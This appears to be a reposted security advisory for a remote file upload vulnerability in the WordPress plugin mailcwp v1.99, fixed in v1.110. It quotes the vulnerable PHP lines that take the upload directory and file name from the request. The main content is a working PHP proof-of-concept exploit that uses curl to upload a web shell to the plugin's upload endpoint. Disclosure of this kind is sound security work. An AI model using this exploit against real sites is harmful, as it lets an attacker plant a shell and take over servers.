Wordpress Plugin mailcwp v1.99 Remote file upload


#- Title : Wordpress Plugin mailcwp v1.99 Remote file upload
#- Author : Larry W. Cashdollar, @_larry0
#- Vendor : vCadreWorks Pty Ltd
#- Download Site: wordpress.org/plugins/mailcwp/
#- Tested on : ubuntu
#- Date : 09/17/2015

Vulnerability :

2 $message_id = $_REQUEST["message_id"]; 
3 $upload_dir = $_REQUEST["upload_dir"];
.
8 $fileName = $_FILES["file"]["name"];
9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");

Proof of Concept : 

<?php
/*Larry W. Cashdollar @_larry0
Exploit for mailcwp v1.99 shell will be called 1-shell.php.
7/9/2015
*/
        $target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
        $file_name_with_full_path = '/var/www/shell.php';
 
        echo "POST to $target_url $file_name_with_full_path";
        $post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path);
 
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,$target_url);
        curl_setopt($ch, CURLOPT_POST,1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        $result=curl_exec ($ch);
        curl_close ($ch);
        echo "<hr>";
        echo $result;
        echo "<hr>";
?>

*  Fixed in v1.110

0 Response to "Wordpress Plugin mailcwp v1.99 Remote file upload"

Posting Komentar